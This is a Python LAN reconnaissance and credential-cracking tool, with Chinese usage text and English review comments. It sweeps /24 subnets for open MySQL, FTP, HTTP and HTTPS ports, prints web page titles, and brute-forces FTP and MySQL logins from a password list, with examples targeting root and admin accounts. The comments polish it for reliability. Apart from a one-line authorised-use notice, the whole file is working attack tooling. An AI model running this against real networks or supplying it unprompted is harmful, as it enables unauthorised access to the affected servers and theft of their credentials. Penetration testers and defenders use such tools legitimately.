Python内网渗透 — Python LAN reconnaissance: a threaded TCP port sweep of /24 networks (default ports 3306, 21, 80, 443, with HTTP title grabbing) plus FTP/MySQL password brute-forcing. For use only on networks you are authorised to test.
import concurrent.futures
import ftplib
import optparse
import os
import re
import socket
import sys
import threading

import IPy
import mysql.connector
import requests
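# (ip, port) tuples of open ports found by portScan; shared across scanner threads.
routers = []
# Serialises console output and the routers.append() across scanner threads.
lock = threading.Lock()
# Default password list: password.txt in the current working directory.
# os.path.join keeps this portable; the original concatenated a literal
# backslash, which produced "/cwd\password.txt" on non-Windows hosts.
pass_dict = os.path.join(os.getcwd(), 'password.txt')
# Dotted-quad IPv4 validator for the -i argument: four octets, each 0-255.
compile_ip = re.compile(r'^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$')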
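def search_routers(Bip=None, *, max_workers=128):
    """Sweep hosts .1-.254 of every /24 named in Bip for the ports in `port_list`.

    Args:
        Bip: list of IPv4 address strings; the first three octets of each
            name the /24 to sweep. None means every address this machine
            resolves to via socket.gethostbyname_ex (which may include
            127.0.0.1). No real netmask is consulted: every entry is
            treated as a /24.
        max_workers: upper bound on concurrent probe threads. The original
            started one thread per (host, port) pair - over a thousand for a
            single /24 with the default four ports, far more for a CIDR
            range - which exhausts thread and file-descriptor limits.

    Every (host, port) pair is handed to portScan, which prints open ports
    and records them in the global `routers`. Returns once every probe has
    finished. A non-numeric entry in the global `port_list` raises
    ValueError before any probe starts.
    """
    if Bip is None:
        local_ips = socket.gethostbyname_ex(socket.gethostname())[2]
    else:
        local_ips = Bip

    # Convert once rather than per host; a bad -o value fails immediately.
    ports = [int(port) for port in port_list]

    targets = []
    for lip in local_ips:
        octets = lip.split('.')
        for last in range(1, 255):
            octets[3] = str(last)
            host = '.'.join(octets)
            targets.extend((host, port) for port in ports)

    with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = [pool.submit(portScan, host, port) for host, port in targets]
        for (host, port), fut in zip(targets, futures):
            exc = fut.exception()  # blocks until that probe is done
            if exc is not None:
                # Keep the old per-thread error visibility without aborting
                # the rest of the sweep (a pool would otherwise swallow it).
                print(f'[!] {host}:{port} 探测出错: {exc!r}', file=sys.stderr)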
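def portScan(rip, port):
    """Probe TCP rip:port with a 2-second connect timeout.

    An open port is printed, looked up for an HTTP <title> when it is port 80,
    and appended as (rip, port) to the shared global `routers`. Closed,
    filtered or unreachable ports leave no trace. The global `lock`
    serialises the console output and the list append across threads.

    Fixes relative to the original: the socket is closed even if connect_ex
    raises; the lock is released by `with`, so an exception inside
    get_title can no longer leave it held and deadlock every other scanner
    thread; and closed ports are no longer appended to `routers` (they
    were, which made the list identical to the scan space).

    Args:
        rip: target IPv4 address as a string.
        port: TCP port as an int.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
        probe.settimeout(2)
        rc = probe.connect_ex((rip, port))
    if rc != 0:
        return  # refused, timed out or unreachable: treated as closed

    with lock:
        print(rip.ljust(15), f'\t{port}开放')
        if port == 80:
            # Still under the lock so the title prints next to its host
            # line; this is why get_title must be bounded by a timeout.
            get_title(rip, port)
        routers.append((rip, port))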
# def portScan(tgtIp, tgtPort):
# socket.setdefaulttimeout(1)
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# address = (tgtIp, tgtPort)
# try:
# s.connect(address)
# print('[+] {} : open [{}] '.format(tgtIp, tgtPort))
# except Exception as e:
# s.close()
# print('[+] {} : closed [{}] error : {}'.format(tgtIp, tgtPort, e))
# s.close()
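def get_title(gip, port, *, timeout=5, max_bytes=64 * 1024):
    """Print the HTML <title> of http://gip:port, if the host serves one.

    Called by portScan (while it holds the global lock) for every open
    port 80. Best-effort: any request failure or missing <title> is ignored
    so the sweep continues.

    Args:
        gip: target IPv4 address.
        port: TCP port, joined into the URL as-is.
        timeout: connect/read timeout in seconds. The original had none, so
            a tarpit or half-open listener could hang the scanner thread -
            and, because portScan holds the lock, every other thread.
        max_bytes: only this much of the body is read; enough for a <head>
            and a cap on what a hostile host can push at the scanner.

    NOTE(review): redirects are still followed (requests default), so a
    host can send the scanner to an arbitrary URL - disable with
    allow_redirects=False if that matters in your environment.
    """
    url = 'http://{}:{}'.format(gip, port)
    try:
        # stream=True lets us stop after the first chunk instead of
        # buffering an arbitrarily large response.
        with requests.get(url=url, timeout=timeout, stream=True) as res:
            head = next(res.iter_content(chunk_size=max_bytes), b'')
            encoding = res.encoding or 'utf-8'
    except requests.RequestException:
        return  # reset, timeout, malformed response...: no title to show
    try:
        text = head.decode(encoding, errors='replace')
    except LookupError:  # server advertised a charset Python does not know
        text = head.decode('utf-8', errors='replace')

    match = re.search(r'<title[^>]*>(.*?)</title>', text, re.IGNORECASE | re.DOTALL)
    if match is None:
        return
    # The title comes from an untrusted host and goes straight to the
    # terminal: collapse whitespace and drop control characters so it
    # cannot carry an ANSI escape sequence.
    title = ' '.join(match.group(1).split())
    title = ''.join(ch for ch in title if ch.isprintable())
    print('[{}] {}'.format(title, url))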
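def brute_ftp(host, pass_file, *, timeout=10):
    """Try every password in pass_file for each name in the global `user`
    against the FTP server on host (credentials go over the wire in clear).

    Args:
        host: FTP server address (port 21).
        pass_file: path of a newline-separated password list, re-read for
            every username.
        timeout: per-connection timeout in seconds; the original had none,
            so a dead host could block each attempt indefinitely.

    Returns:
        True on the first successful login; False when the list is
        exhausted or the server cannot be reached. Progress is printed.

    Fixes relative to the original: the bare `except:` also swallowed
    KeyboardInterrupt (Ctrl-C could not stop a long run) and hid network
    errors, so an unreachable host was "tried" once per password; the
    control socket of a failed attempt was never closed.
    """
    for u in user:
        print('\nFTP用户名 ' + u)
        with open(pass_file, 'r') as f:
            for line in f:
                password = line.strip('\r\n')
                print('尝试密码: ', password)
                try:
                    ftp = ftplib.FTP(host, timeout=timeout)
                except OSError as exc:
                    # Refused / timed out: no password will change that.
                    print('FTP连接失败: {}'.format(exc))
                    return False
                try:
                    ftp.login(u, password)
                except ftplib.error_perm:
                    # 5xx reply (530 Login incorrect): try the next password.
                    print('FTP登录 \033[1;31;40m失败\033[0m!')
                    continue
                except ftplib.all_errors as exc:
                    print('FTP连接错误: {}'.format(exc))
                    return False
                else:
                    print('FTP登录 \033[1;32;40m成功\033[0m!')
                    print('FTP用户名 ' + u)
                    return True
                finally:
                    ftp.close()  # release the control socket either way
    return False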
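def brute_mysql(host, pass_file, *, timeout=10):
    """Try every password in pass_file for each name in the global `user`
    against the MySQL server on host.

    Args:
        host: MySQL server address (port 3306).
        pass_file: path of a newline-separated password list, re-read for
            every username.
        timeout: per-attempt connection timeout in seconds; the original
            had none, so a dead host could block each attempt indefinitely.

    Returns:
        True on the first successful login; False when the list is
        exhausted or the server cannot be reached. Progress is printed.

    Fixes relative to the original: the bare `except:` also swallowed
    KeyboardInterrupt and hid real connection errors, so an unreachable
    or blocking host was "tried" once per password; a successful
    connection was never closed.
    """
    for u in user:
        print('\nMySQL用户名 ' + u)
        with open(pass_file, 'r') as f:
            for line in f:
                password = line.strip('\r\n')
                print('尝试密码: ', password)
                try:
                    conn = mysql.connector.connect(
                        host=host,
                        user=u,
                        password=password,
                        connection_timeout=timeout,
                    )
                except mysql.connector.Error as exc:
                    # 1045 = ER_ACCESS_DENIED_ERROR: wrong credentials.
                    if exc.errno == 1045:
                        print('MySQL登录 \033[1;31;40m失败\033[0m!')
                        continue
                    # Anything else (unreachable host, host blocked after
                    # too many failures, unsupported auth plugin) will not
                    # be fixed by the next password: stop hammering.
                    print('MySQL连接错误: {}'.format(exc))
                    return False
                conn.close()  # the original leaked the session
                print('MySQL登录 \033[1;32;40m成功\033[0m!')
                print('MySQL用户名 ' + u)
                return True
    return False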
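if __name__ == '__main__':
    # User-facing usage text, kept byte-for-byte. Only the backslash before
    # "password.txt" is now escaped: same output, no invalid-escape warning.
    usage = '''直接运行或是输入其他错误参数,扫描本机所在局域网段\n
-o 指定扫描端口,用英文逗号隔开,默认扫描3306(mysql), 21(ftp), 80(http), 443(https)\n
扫描指定网段/ip:-i 网段/ip,如10.20.24.0/24,192.168.123.0\n
爆破指定服务:-b ftp/mysql -i ip -u 指定用户名列表,用英文逗号隔开 -p 指定密码文件\n
举例:demo -b mysql -i 127.0.0.1 -u root,admin -p C:\\password.txt
爆破127.0.0.1的mysql服务器密码,爆破用户名root和admin的密码\n
demo -i 10.20.24.0/24
扫描10.20.24.0/255.255.255.0网段下所有主机的服务
'''
    parse = optparse.OptionParser(usage=usage)
    parse.add_option('-i', dest='add', type=str, help='网段或ip地址')
    parse.add_option('-b', dest='server', type=str, help='爆破指定服务')
    parse.add_option('-u', dest='user', type=str, help='爆破用户名')
    parse.add_option('-p', dest='pass_dict', type=str, help='密码文件')
    parse.add_option('-o', dest='port_list', type=str, help='指定端口')
    options, argv = parse.parse_args()

    # -p overrides the module-level default (password.txt in the cwd).
    if options.pass_dict is not None:
        pass_dict = options.pass_dict

    # Module globals read by brute_ftp/brute_mysql (`user`) and by
    # search_routers (`port_list`). Assignments here are already at module
    # scope, so the old `global` statements were no-ops and are dropped.
    user = options.user.split(',') if options.user is not None else ['root']

    if options.port_list is not None:
        # Kept as strings: search_routers does the int() conversion. Reject
        # junk here so a typo fails fast instead of inside the scan.
        port_list = [p.strip() for p in options.port_list.split(',')]
        bad_ports = [p for p in port_list if not p.isdigit() or not 0 < int(p) < 65536]
        if bad_ports:
            parse.error('非法端口: ' + ','.join(bad_ports))  # prints usage, exits 2
    else:
        port_list = ['3306', '21', '80', '443']

    if options.server is not None:
        # A brute-force run must name its target and a supported service.
        # Previously a missing -i or an unknown service silently fell
        # through to a sweep of the whole local LAN - the wrong blast
        # radius for a typo in an attack tool.
        if options.server not in ('ftp', 'mysql'):
            parse.error('-b 只支持 ftp 或 mysql')
        if options.add is None:
            parse.error('-b 需要用 -i 指定目标ip')
        if not os.path.isfile(pass_dict):
            parse.error('密码文件不存在: ' + pass_dict)
        brute = brute_ftp if options.server == 'ftp' else brute_mysql
        found = brute(options.add, pass_file=pass_dict)
        # Exit status reflects the outcome so the tool can be scripted.
        sys.exit(0 if found else 1)

    if options.add is None:
        # Documented default: no target means sweep the local LAN.
        print(parse.usage)
        search_routers()
        sys.exit()

    if '/' not in options.add:
        if compile_ip.match(options.add):
            search_routers([options.add])
        else:
            # Documented fallback: an unrecognised -i value also sweeps the
            # local LAN; print the usage so the user sees why.
            print(parse.usage)
            search_routers()
        sys.exit()

    # CIDR target: collapse it into the /24 networks search_routers walks
    # (it always probes .1-.254 of each entry, so a /16 becomes 256 entries).
    try:
        network = IPy.IP(options.add)
    except ValueError as exc:
        parse.error('无法解析网段 {}: {}'.format(options.add, exc))
    # dict.fromkeys de-duplicates while preserving order; the old
    # `if x not in list` check was quadratic over a /16's 65536 addresses.
    subnets = dict.fromkeys(
        '.'.join(str(ip).split('.')[:3]) + '.0' for ip in network
    )
    search_routers(list(subnets))
    sys.exit()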
# search_routers(['10.20.24.0'])
# search_routers()
# python -m pip install -i https://pypi.tuna.tsinghua.edu.cn/simple mysql-connector IPy